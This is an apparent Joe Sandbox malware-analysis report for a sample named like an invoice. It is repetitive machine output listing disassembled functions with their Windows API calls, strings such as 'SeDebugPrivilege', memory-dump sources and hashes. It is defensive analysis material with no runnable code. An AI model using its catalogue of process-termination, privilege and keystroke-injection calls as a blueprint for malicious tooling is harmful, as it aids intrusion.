                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                          • String ID:
                                          • API String ID: 560350794-0
                                          • Opcode ID: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                          • Instruction ID: 5de9ffb64ca5e15a2b50b30bc9937a924b2564530b5861c8322637ebb6f06415
                                          • Opcode Fuzzy Hash: e599abc5ccc1fcc2afa0811a74523479773a4e2d78cc03c258ebc6d435cce25a
                                          • Instruction Fuzzy Hash: A4F12871A00109AFCB14DF94C888EEEB7B9FF49314F10846AF909AB251DB35AE46CB55
                                          Function 0047F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 0047F6B5
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F848
                                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0047F86C
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8AC
                                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0047F8CE
                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0047FA4A
                                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0047FA7C
                                          • CloseHandle.KERNEL32(?), ref: 0047FAAB
                                          • CloseHandle.KERNEL32(?), ref: 0047FB22
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                          • String ID:
                                          • API String ID: 4090791747-0
                                          • Opcode ID: b61b5092976dc11b3ed5dc071c2aa5c938d2e0620ac829c290ec03e61a2ac541
                                          • Instruction ID: 06b6fb47819207378a011b81351d7d70f99dbcb89b467e7706fbe8a6ff9703be
                                          • Opcode Fuzzy Hash: b61b5092976dc11b3ed5dc071c2aa5c938d2e0620ac829c290ec03e61a2ac541
                                          • Instruction Fuzzy Hash: D8E194716042009FC714EF25C451BAA7BE1BF85314F14856EF8999B3A2DB38EC49CB5A
                                          Function 00464CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
                                            • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
                                            • Part of subcall function 00464A31: GetFileAttributesW.KERNEL32(?,0046370B), ref: 00464A32
                                          • lstrcmpiW.KERNEL32(?,?), ref: 00464D40
                                          • _wcscmp.LIBCMT ref: 00464D5A
                                          • MoveFileW.KERNEL32(?,?), ref: 00464D75
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                          • String ID:
                                          • API String ID: 793581249-0
                                          • Opcode ID: e5efdc4b7bed8b35d3c7756aed83619e761acd6f8ed92700794926c6f689935b
                                          • Instruction ID: 3e0d64ecfe06201b2d7f4e4ce82b19db3d94e317acadfd9fd6841a38a6d3c077
                                          • Opcode Fuzzy Hash: e5efdc4b7bed8b35d3c7756aed83619e761acd6f8ed92700794926c6f689935b
                                          • Instruction Fuzzy Hash: 1D5164B25083459BCB24EFA1D8819DF73ECAF84354F40092FB289D3151EE79A589C76B
                                          Function 00488645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 004886FF
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                          • Instruction ID: 67c69bdd2abc2e43d0d58bc2ecba6baab6695951e18c15bee5b3ec72a7eaee37
                                          • Opcode Fuzzy Hash: 9e4666c3df532daa50fe19b6785993d851fb0bba6d5b1ec7531c4121b57b79da
                                          • Instruction Fuzzy Hash: BE519530500244BEDB20BB298C89F5E7B64EB05724FA0492FF911E62E1DF79A990DB5D
                                          Function 00402B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C2F7
                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C319
                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C331
                                          • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C34F
                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C370
                                          • DestroyIcon.USER32(00000000), ref: 0043C37F
                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C39C
                                          • DestroyIcon.USER32(?), ref: 0043C3AB
                                            • Part of subcall function 0048A4AF: DeleteObject.GDI32(00000000), ref: 0048A4E8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                          • String ID:
                                          • API String ID: 2819616528-0
                                          • Opcode ID: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                          • Instruction ID: 8b5e312d24aa0fc7293d55633b028b71e285ae3fa30838bdc618f7a4141ee9b3
                                          • Opcode Fuzzy Hash: 30831d3652e0c4a0d09569093ab55e826fc0c5f0f59ece252e466e99477c3991
                                          • Instruction Fuzzy Hash: 9D516A74A00205AFDB20DF65CD85FAF3BB5EB58310F10452EF902A72D0D7B4A991DB68
                                          Function 0045966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0045A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045A84C
                                            • Part of subcall function 0045A82C: GetCurrentThreadId.KERNEL32 ref: 0045A853
                                            • Part of subcall function 0045A82C: AttachThreadInput.USER32(00000000,?,00459683,?,00000001), ref: 0045A85A
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 0045968E
                                          • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004596AB
                                          • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 004596AE
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596B7
                                          • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004596D5
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596D8
                                          • MapVirtualKeyW.USER32(00000025,00000000), ref: 004596E1
                                          • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004596F8
                                          • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 004596FB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                          • String ID:
                                          • API String ID: 2014098862-0
                                          • Opcode ID: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                          • Instruction ID: 1862abde6b5ba1d27f2b77b23e96e8fddf5d6721de8ccd0207d4cd72f070cce3
                                          • Opcode Fuzzy Hash: 97659e6d0eeaf490ac976d3d5fe311f7ccd298156506907ffd454ad2a564656a
                                          • Instruction Fuzzy Hash: F011E571910618BEF6106F61DC49F6E3B1DDB4C755F100939F644AB0A1CAF25C15DBA8
                                          Function 00458921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0045853C,00000B00,?,?), ref: 0045892A
                                          • HeapAlloc.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458931
                                          • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458946
                                          • GetCurrentProcess.KERNEL32(?,00000000,?,0045853C,00000B00,?,?), ref: 0045894E
                                          • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 00458951
                                          • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0045853C,00000B00,?,?), ref: 00458961
                                          • GetCurrentProcess.KERNEL32(0045853C,00000000,?,0045853C,00000B00,?,?), ref: 00458969
                                          • DuplicateHandle.KERNEL32(00000000,?,0045853C,00000B00,?,?), ref: 0045896C
                                          • CreateThread.KERNEL32(00000000,00000000,00458992,00000000,00000000,00000000), ref: 00458986
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                          • String ID:
                                          • API String ID: 1957940570-0
                                          • Opcode ID: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                          • Instruction ID: 349ed70c1d76ccaf0bdfd0abb61d7988567b7a63eab8a905bd57cb3f4c4245c0
                                          • Opcode Fuzzy Hash: 3e7611f068968c6c6daa1a3146ff6b5b84d59536ecce8ca695804ebc6f6fd54c
                                          • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC8DF6B7BACEB89711F508825FA05DB1A1CA759C14CB24
                                          Function 0047975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0045710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                            • Part of subcall function 0045710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                            • Part of subcall function 0045710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                            • Part of subcall function 0045710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00479806
                                          • _memset.LIBCMT ref: 00479813
                                          • _memset.LIBCMT ref: 00479956
                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00479982
                                          • CoTaskMemFree.OLE32(?), ref: 0047998D
                                          Strings
                                          • NULL Pointer assignment, xrefs: 004799DB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                          • String ID: NULL Pointer assignment
                                          • API String ID: 1300414916-2785691316
                                          • Opcode ID: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
                                          • Instruction ID: 344d97a8cecc5579365d94fc52d7d4a9bdae2fe77cb17e56d270d326fab8ac0d
                                          • Opcode Fuzzy Hash: 45d3d11671b48f4c91a0fa55736b5ede04149e8acd56d59b25060feee5a3bfa2
                                          • Instruction Fuzzy Hash: BD915CB1D00218EBDB10DFA5DC81EDEBBB9EF08314F10806AF519A7291EB755A44CFA5
                                          Function 00486D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00486E24
                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00486E38
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00486E52
                                          • _wcscat.LIBCMT ref: 00486EAD
                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00486EC4
                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00486EF2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window_wcscat
                                          • String ID: SysListView32
                                          • API String ID: 307300125-78025650
                                          • Opcode ID: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                          • Instruction ID: cb01a20e413fb831c79b84d4e1a22deaf7a16da1e784ee9815b65cba95e2bd2f
                                          • Opcode Fuzzy Hash: 16f1706c89c53c521989aa15edd3457245b1a700a2ad8cceaac67dbb77529257
                                          • Instruction Fuzzy Hash: 6341A370A00308ABDB21AF64CC85BEF77F8EF08354F11082BF544A7291D6799D858B68
                                          Function 0047E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00463C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00463C7A
                                            • Part of subcall function 00463C55: Process32FirstW.KERNEL32(00000000,?), ref: 00463C88
                                            • Part of subcall function 00463C55: CloseHandle.KERNEL32(00000000), ref: 00463D52
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9A4
                                          • GetLastError.KERNEL32 ref: 0047E9B7
                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0047E9E6
                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0047EA63
                                          • GetLastError.KERNEL32(00000000), ref: 0047EA6E
                                          • CloseHandle.KERNEL32(00000000), ref: 0047EAA3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                          • String ID: SeDebugPrivilege
                                          • API String ID: 2533919879-2896544425
                                          • Opcode ID: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                          • Instruction ID: ee7027a858fb35c2998370541a0cb7821fbd3e1ab4d9769570fd7f32c35e06b7
                                          • Opcode Fuzzy Hash: 1fbe102fe1978df8388a2962b1b00d0cd5216d5acde680508b8c4a8fc22a507b
                                          • Instruction Fuzzy Hash: E1419D712002009FDB10EF25DC95BAEB7A5AF44318F04856EF9069B3C2DB78AC09CB99
                                          Function 00462F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadIconW.USER32(00000000,00007F03), ref: 00463033
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: IconLoad
                                          • String ID: blank$info$question$stop$warning
                                          • API String ID: 2457776203-404129466
                                          • Opcode ID: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                          • Instruction ID: 1734436af2ca56e59899cd3bdf017f39c547290e8d4403808a282f24c331c6a5
                                          • Opcode Fuzzy Hash: 55f9dc3ea46c5c896c834eceb9773494ed516fdc9e05eb433b65141dcb2bff31
                                          • Instruction Fuzzy Hash: F211F631348386BAE7249E55DC42DAF679C9F15365B20002FF90066281FAFC5E4956AE
                                          Function 004642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00464312
                                          • LoadStringW.USER32(00000000), ref: 00464319
                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0046432F
                                          • LoadStringW.USER32(00000000), ref: 00464336
                                          • _wprintf.LIBCMT ref: 0046435C
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0046437A
                                          Strings
                                          • %s (%d) : ==> %s: %s %s, xrefs: 00464357
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString$Message_wprintf
                                          • String ID: %s (%d) : ==> %s: %s %s
                                          • API String ID: 3648134473-3128320259
                                          • Opcode ID: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                          • Instruction ID: 8e316eae760c98dab52acacd6546c6ae495e9062239688ff7a3f09ebd5f77a5e
                                          • Opcode Fuzzy Hash: 965032fae8988b6724a64616dd310853d65f609a359c49a1a2d3266552516382
                                          • Instruction Fuzzy Hash: CB0167F2900208BFD751AB90DD89EFB776CEB08301F5009B6BB45E2151FA785E894B79
                                          Function 0048D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • GetSystemMetrics.USER32(0000000F), ref: 0048D47C
                                          • GetSystemMetrics.USER32(0000000F), ref: 0048D49C
                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0048D6D7
                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0048D6F5
                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0048D716
                                          • ShowWindow.USER32(00000003,00000000), ref: 0048D735
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0048D75A
                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0048D77D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                          • String ID:
                                          • API String ID: 1211466189-0
                                          • Opcode ID: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                          • Instruction ID: 2f618d94a1d43a989375790be64f9a6bb81cc316bd664b93e4dd4f842dd9a18d
                                          • Opcode Fuzzy Hash: d3703f674391628daf823e2a44e71b595811e89c5d6afcb3d767f65da08f560a
                                          • Instruction Fuzzy Hash: 2EB1AE71901219EFDF14EF68C9857AE7BB1BF04701F08847AEC48AB295E738A950CB54
                                          Function 00402A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON
